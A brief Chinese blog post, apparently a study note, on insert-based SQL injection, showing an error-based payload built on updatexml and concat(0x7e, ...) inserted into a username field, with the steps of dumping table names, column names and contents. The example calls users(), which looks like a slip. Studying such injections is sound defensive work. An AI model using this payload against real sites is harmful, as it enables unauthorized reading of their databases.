SQL注入之insert注入
2019-02-26 本文已影响19人
原来是老王
insert注入:
insert into member(username,pw,sex,phonenum,email,address) values('wangwu'or updatexml(1,concat(0x7e,(users())),0) or'',md5('a'),'a','aa','a','a')
在用户名输入:
payload
wangwu'or updatexml(1,concat(0x7e,(命令)),0) or'
1. 爆表名
2. 爆列名
3. 爆内容
